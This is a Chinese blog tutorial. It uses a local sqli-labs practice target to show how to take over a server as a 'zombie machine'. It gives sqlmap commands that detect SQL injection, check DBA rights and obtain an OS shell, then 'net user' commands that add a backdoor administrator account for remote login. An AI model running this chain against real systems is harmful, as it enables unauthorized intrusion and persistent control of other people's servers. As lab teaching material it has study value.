001-肉鸡抓取

本文通过一个sqli-labs靶场实例,演示了如何利用SQL注入漏洞抓取肉鸡。首先,通过SQLMAP探测并确认网站存在SQL注入,接着获取服务器shell权限,然后在肉鸡上创建新用户并将其添加到管理员组,最后通过新建用户连接到肉鸡,完成抓取过程。
摘要由CSDN通过智能技术生成

001-肉鸡抓取(DOS命令:net user 用户 密码 /add)

本文以抓肉鸡为例,展示 net user 用户 密码 /addnet localgroup administrators 用户 在实战中的应用;需要在虚拟机上安装 sqli-labs 靶场,把他当作成真实的网站即可。

声明:本文所有内容仅供学习参考,请勿触犯《网络安全法》

|肉鸡的概念|DOS命令 |

用到的知识:

DOS基本命令: net user 用户 密码 /add net localgroup administrators 用户 /add
工具: SQLMAP

肉鸡抓取

要想抓取肉鸡就得先找到抓肉鸡的入口(网站漏洞),大部分被抓到的肉鸡都是因为搭建在肉鸡上的网站存在漏洞,所以其被抓。
1、虚拟机上安装好 sqli-labs 靶场后,用宿主机访问虚拟机上的靶场(下图相当于真实网站的页面)

2、用 SQLMAP 探测发现其存在SQL注入漏洞(真实网站存在SQL注入漏洞)

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --batch

请添加图片描述
3、查看是否有权限连接网站所在服务器shell

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --is-dba --batch

请添加图片描述
4、确定有权限后,连接服务器,获取其shell

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --os-shell

请添加图片描述
请添加图片描述
5、拿到shell后是抓鸡成功的第一步,接下来在肉鸡上创建一个用户,并将其添加到管理员用户组。

net user www123 www123 /add

请添加图片描述

net localgroup administrators www123 /add

请添加图片描述
6、用本机连接肉鸡,连接用户和密码为上面创建的用户和密码,连接首页填服务器IP,成功抓取肉鸡

请添加图片描述
请添加图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值